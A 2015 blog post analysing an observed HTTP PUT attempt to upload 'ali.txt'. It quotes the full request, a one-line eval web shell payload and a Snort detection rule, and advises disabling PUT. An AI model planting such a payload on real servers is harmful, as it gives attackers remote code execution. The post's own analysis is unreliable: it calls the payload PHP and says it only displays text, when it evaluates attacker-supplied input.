Friday, March 13, 2015

PHP Injection Attempt ali.txt Explained

I posted the basic details here pastebin.com/AqDJrchF but I wanted to go into more detail.

PUT /ali.txt HTTP/1.1
Accept: application/json
Content-Type: application/json
Content-Length: 39
Expect: 100-continue
Connection: Keep-Alive


alihack<%eval request("alihack.com")%>


So it's been around for a while, you may have seen the requests, but what are they trying to do?

1.) First evil IP (192.210.60.124) sends the attack request. It's difficult to tell without further research if this is truly a bad guy's server or just a good guy's server that was compromised and is now being used to launch attacks for the attacker

2.) Second an IDS (Intrusion detected system) is sitting in front of the web server watching requests come in and firing off Snort rules. It triggered on this one because the url contained '/ali.txt' in it and it was a PUT http request.

MALWARE-TOOLS BlackSpider Tool ali.txt file upload attempt (1:32875)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"MALWARE-TOOLS BlackSpider Tool ali.txt file upload attempt"; flow:to_server,established; content:"/ali.txt"; http_uri; urilen:8; content:"PUT"; http_method; metadata:impact_flag red, service http; reference:url,virustotal.com/en/file/3b0e2ab93a43db122bc9ba4448cb21c8ae01f18068b15a6e0a71db61fb943ed1/analysis/; classtype:misc-activity; sid:32875; rev:1; )


3.) Third If the web server has HTTP PUT enabled (which is pretty much unheard of nowadays on the Internet) then you have a major problem because that means anybody in the world can upload any file they want to your server by running the PUT command.

PUT /ali.txt

4.) Fourth and finally if the attack successfully uploads the 'ali.txt' file then the file will contain the PHP script below so that when the attacker makes a call-back to your website/ali.txt they'll see the text 'alihack.com' and know it was successful. In this case I think the general idea is that this truly isn't a bad guy attacking, it's good guys trying to share and create awareness that you shouldn't have HTTP PUT enabled. So check your web server, if you see ali.txt you know you've got issues and need to fix them.

alihack<%eval request("alihack.com")%>

Lock those servers down!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

4 comments:

  1. This isn't PHP, it's an attack on a Rails stack.

    ReplyDelete
  2. This isn't PHP, it's an attack on a Rails stack.

    ReplyDelete